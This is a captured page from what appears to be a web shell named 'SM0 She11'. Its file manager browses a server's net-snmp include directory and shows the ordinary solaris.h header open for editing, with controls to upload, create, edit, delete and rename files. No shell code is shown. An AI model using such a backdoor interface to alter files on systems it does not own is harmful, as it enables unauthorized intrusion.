SM0 She11
Path:
/
/
usr
/
include
/
net-snmp
/
system
Full Path (server): /usr/include/net-snmp/system
Create Fil3
Upl04d Fil3
📄 aix.h
[E]
[D]
[R]
📄 bsd.h
[E]
[D]
[R]
📄 bsdi.h
[E]
[D]
[R]
📄 bsdi3.h
[E]
[D]
[R]
📄 bsdi4.h
[E]
[D]
[R]
📄 cygwin.h
[E]
[D]
[R]
📄 darwin.h
[E]
[D]
[R]
📄 darwin10.h
[E]
[D]
[R]
📄 darwin7.h
[E]
[D]
[R]
📄 darwin8.h
[E]
[D]
[R]
📄 darwin9.h
[E]
[D]
[R]
📄 dragonfly.h
[E]
[D]
[R]
📄 dynix.h
[E]
[D]
[R]
📄 freebsd.h
[E]
[D]
[R]
📄 freebsd10.h
[E]
[D]
[R]
📄 freebsd2.h
[E]
[D]
[R]
📄 freebsd3.h
[E]
[D]
[R]
📄 freebsd4.h
[E]
[D]
[R]
📄 freebsd5.h
[E]
[D]
[R]
📄 freebsd6.h
[E]
[D]
[R]
📄 freebsd7.h
[E]
[D]
[R]
📄 freebsd8.h
[E]
[D]
[R]
📄 freebsd9.h
[E]
[D]
[R]
📄 generic.h
[E]
[D]
[R]
📄 hpux.h
[E]
[D]
[R]
📄 irix.h
[E]
[D]
[R]
📄 linux.h
[E]
[D]
[R]
📄 mingw32.h
[E]
[D]
[R]
📄 mips.h
[E]
[D]
[R]
📄 netbsd.h
[E]
[D]
[R]
📄 openbsd.h
[E]
[D]
[R]
📄 openbsd4.h
[E]
[D]
[R]
📄 openbsd5.h
[E]
[D]
[R]
📄 osf5.h
[E]
[D]
[R]
📄 solaris.h
[E]
[D]
[R]
📄 solaris2.3.h
[E]
[D]
[R]
📄 solaris2.4.h
[E]
[D]
[R]
📄 solaris2.5.h
[E]
[D]
[R]
📄 solaris2.6.h
[E]
[D]
[R]
📄 sunos.h
[E]
[D]
[R]
📄 svr5.h
[E]
[D]
[R]
📄 sysv.h
[E]
[D]
[R]
📄 ultrix4.h
[E]
[D]
[R]
Editing: solaris.h
#include "sysv.h" #undef bsdlike #undef IP_FORWARDING_SYMBOL #undef ARPTAB_SYMBOL #define ARPTAB_SYMBOL "arptab_nb" #undef ARPTAB_SIZE_SYMBOL #define ARPTAB_SIZE_SYMBOL "arphd" #undef ICMPSTAT_SYMBOL #undef TCPSTAT_SYMBOL #undef TCP_SYMBOL #undef UDPSTAT_SYMBOL #undef UDB_SYMBOL #undef RTTABLES_SYMBOL #undef RTHASHSIZE_SYMBOL #undef RTHOST_SYMBOL #undef RTNET_SYMBOL #undef IPSTAT_SYMBOL #undef TCP_TTL_SYMBOL #undef PROC_SYMBOL #undef TOTAL_MEMORY_SYMBOL #undef MBSTAT_SYMBOL #define UDP_ADDRESSES_IN_HOST_ORDER 1 #define UDP_PORTS_IN_HOST_ORDER 1 #define TCP_PORTS_IN_HOST_ORDER 1 /* define the extra mib modules that are supported */ #define NETSNMP_INCLUDE_HOST_RESOURCES #define NETSNMP_INCLUDE_IFTABLE_REWRITES /* Solaris 2.6+ */ #define _SLASH_PROC_METHOD_ 1 /* Solaris 7+ */ #define NETSNMP_DONT_USE_NLIST 1 /* * NEW_MIB_COMPLIANT is a define used in Solaris 10U4+ to enable additional * MIB information (it affects the structs in <inet/mib2.h>) */ #define NEW_MIB_COMPLIANT
Save